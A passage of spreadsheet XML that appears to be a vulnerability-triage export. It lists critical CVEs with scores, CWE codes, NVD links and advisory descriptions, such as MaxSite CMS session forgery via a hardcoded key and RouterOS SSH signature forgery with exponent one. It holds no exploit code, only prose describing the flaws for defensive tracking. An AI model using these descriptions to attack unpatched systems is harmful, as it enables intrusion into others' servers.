          <t>MaxSite CMS through 109.6 ships with a hardcoded session encryption key in application/config/config.php that is never changed during installation, allowing unauthenticated attackers to forge administrator session cookies. Attackers can mint a malicious ci_session cookie with administrator privileges by computing an HMAC-SHA1 using the publicly known encryption key, bypassing authentication checks in is_login() and mso_check_allow() functions.</t>
        </is>
      </c>
      <c r="S130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87929</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88069</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr"/>
      <c r="Q131" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>Pandora contains a path traversal vulnerability in its archive extraction worker. When processing a specially crafted archive or disk image, attacker-controlled file paths could be used without ensuring that the resulting destination remained within the intended extraction directory.
An attacker able to submit a malicious file for analysis could use path traversal sequences or crafted paths to cause extracted content to be written outside the designated extraction directory, potentially overwriting files accessible to the Pandora worker process. Successful exploitation could result in unauthorized modification of application or system files, denial of service, and potentially further compromise depending on the permissions of the Pandora process and the files that can be overwritten.
The vulnerability is addressed by resolving each extraction destination path before writing and verifying that it remains below the expected extraction directory. Extraction attempts resolving outside this directory are rejected and reported as path traversal attempts.</t>
        </is>
      </c>
      <c r="S131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88069</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63382</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr"/>
      <c r="Q132" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, the libevent evhttp parser in http.c inconsistently handles duplicate Transfer-Encoding headers, comma-separated Transfer-Encoding values, and bare line feeds in chunked framing. evhttp_find_header can select only the first header, evhttp_check_transfer_encoding_ was absent so the previous whole-string comparison fails to recognize valid lists ending in chunked, and evhttp_handle_chunked_read uses EVBUFFER_EOL_CRLF rather than EVBUFFER_EOL_CRLF_STRICT, accepting bare LF chunk terminators. When libevent is deployed behind a proxy that frames the same request differently, an unauthenticated remote attacker can desynchronize request boundaries and smuggle a second request, potentially bypassing access controls or poisoning caches. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63382</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63385</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr"/>
      <c r="Q133" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has two HTTP parsing weaknesses in http.c. evhttp_decode_uri_internal decodes percent-encoded %00 bytes into literal NUL characters, which can cause downstream C string operations to truncate a path and bypass validation performed on a different representation. evhttp_header_is_valid_value also accepts obsolete line folding in header values containing carriage return or line feed characters, allowing a proxy and libevent to interpret headers differently and enabling header injection or access control bypass. The CRLF header acceptance is fixed in versions 2.1.13 and 2.2.2-alpha, but the reviewed patches do not clearly remediate the URI NUL-truncation condition.</t>
        </is>
      </c>
      <c r="S133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63385</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67276</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr"/>
      <c r="Q134" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>RouterOS does not compare the complete RSA public key when matching an SSH authentication request to an authorized user key, checking the key type and modulus but omitting the exponent. Because signature verification uses the client-supplied key, an attacker knowing an authorized RSA modulus can supply a key with exponent one, forge a valid signature, and open an SSH command channel as the target user without the private key.This issue affects only 7.x branch was fixed in versions: 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="S134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67276</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67402</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr"/>
      <c r="Q135" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>An insecure Apache configuration in ConfigServer Security &amp; Firewall maps /usr/bin as CGI programs through the Messenger v3 HTTPS virtual host. A remote unauthenticated attacker whose address is blocked can request a mapped executable and run arbitrary commands as the Apache user. The vulnerability affects installations where CSF Messenger v3 and its HTTPS mode are enabled. WebPros addressed the vulnerability in version 16.31.</t>
        </is>
      </c>
      <c r="S135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67402</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77645</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>0b655efc-079c-4cb9-9e8d-164871239f4e</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr"/>
      <c r="Q136" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>A critical remote code execution (RCE) vulnerability has been reported in PTC Windchill and PTC FlexPLM. The vulnerability may be exploited through the deserialization of untrusted data.</t>
        </is>
      </c>
      <c r="S136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77645</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82090</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr"/>
      <c r="Q137" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>Pocket through 8.33.0.0 allows XSS because "Save to Pocket" injects external HTML into the DOM.  JavaScript code can alter the application state via native bridge methods.</t>
        </is>
      </c>
      <c r="S137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82090</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87930</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr"/>
      <c r="Q138" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS through 109.6 passes the ci_session cookie to unserialize() without class restrictions, allowing unauthenticated attackers to inject PHP objects. Attackers can forge valid session cookies using the hardcoded encryption key to trigger magic methods and corrupt application state or achieve code execution if gadget classes exist.</t>
        </is>
      </c>
      <c r="S138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87930</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51679</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr"/>
      <c r="Q139" s="5" t="inlineStr">
        <is>
          <t>CWE-1281</t>
        </is>
      </c>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in openRISC OR1200 commit 83ac6b. A mismatch between the RTL and netlist can lead to unexpected behavior.</t>
        </is>
      </c>
      <c r="S139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51679</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16272</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr"/>
      <c r="Q140" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>Use of less trusted source vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Exploitation of Trusted Identifiers.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="S140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16272</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22590</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr"/>
      <c r="Q141" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-131</t>
        </is>
      </c>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>eprosima Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Versions prior to 2.6.12, 2.14.6, 3.2.4, 3.3.1, and 3.4.2 have a remotely triggerable Out-of-Bounds Read while processing RTPS `DATA_FRAG` submessages. An attacker can craft a `DATA_FRAG` with a large `sampleSize` but a small actual payload, and set `fragmentsInSubmessage` such that the receiver treats the packet as the LAST fragment**. In this LAST-fragment path, Fast-DDS computes `incoming_length` based on `sampleSize` and calls `memcpy()` without validating `incoming_data.length &gt;= incoming_length`. As a result, `CacheChange_t::add_fragments()` reads past the received UDP datagram buffer and into adjacent heap memory, copying those bytes into the reassembly buffer. In a Discovery Server deployment, the resulting `CacheChange_t` can be relayed to other participants, meaning that a newly joining participant may receive leaked heap memory (e.g., pointer values that could aid ASLR bypass). Versions 2.6.12, 2.14.6, 3.2.4, 3.3.1, and 3.4.2 fix the issue.</t>
        </is>
      </c>
      <c r="S141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22590</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41869</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr"/>
      <c r="Q142" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-862</t>
        </is>
      </c>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Improper Resource Shutdown and Job Interruption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S142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41869</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49849</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr"/>
      <c r="Q143" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>xShop is an open-source shop developed in Laravel. An Unrestricted File Upload vulnerability in xShop version 3.0.3 allows an authenticated administrator to upload executable files (e.g., .php). By uploading a specially crafted php file, an attacker can achieve Remote Code Execution (RCE) on the server, leading to a full system compromise. Version 3.0.4 fixes the issue.</t>
        </is>
      </c>
      <c r="S143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49849</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52766</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr"/>
      <c r="Q144" s="5" t="inlineStr">
        <is>
          <t>CWE-276, CWE-862</t>
        </is>
      </c>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, the {{erasespamedcomments}} wiki action (actions/EraseSpamedCommentsAction.php) accepts a suppr[] array from POST and deletes every wiki page whose tag appears in that array, with no authorization check anywhere in the action body or in the page-deletion path it invokes. Combined with YesWiki's allow-by-default action ACL model, any user who has page write access, which is the default for everyone (default_write_acl='*') on a fresh install can permanently delete arbitrary wiki pages, including the front page, admin pages, and pages owned by other users. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52766</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53939</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr"/>
      <c r="Q145" s="5" t="inlineStr">
        <is>
          <t>CWE-321, CWE-330</t>
        </is>
      </c>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). In versions 0.6.1 through 0.6.2.5, when cjose encrypts a JWE using an AES-CBC-HMAC content-encryption algorithm (`A128CBC-HS256`, `A192CBC-HS384`, or `A256CBC-HS512`) together with any key-management algorithm that generates a fresh content-encryption key (CEK), the CEK is all zero bytes instead of being randomly generated. The resulting JWE is therefore encrypted and authenticated under a fixed, publicly known key, so anyone who obtains the JWE can recover the plaintext and forge or modify the content. This is fixed in version 0.6.2.6 by `_cjose_jwe_set_cek_aes_cbc()` generating the CEK from `RAND_bytes`. A regression test asserts that the `encrypted_key` differs across two encryptions for each AES-CBC-HMAC variant. Until upgrading, for data encrypted with cjose, three options are available. Use an AES-GCM `enc` (`A128GCM` / `A192GCM` / `A256GCM`) instead of an AES-CBC-HMAC `enc`,  use `alg=dir` with a caller-supplied CEK, or avoid using cjose for JWE encryption with the affected algorithm pair. These are mitigations for new ciphertexts only; data already encrypted under the zero key remains compromised and should be re-encrypted (and any secrets it contained rotated).</t>
        </is>
      </c>
      <c r="S145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53939</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55247</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
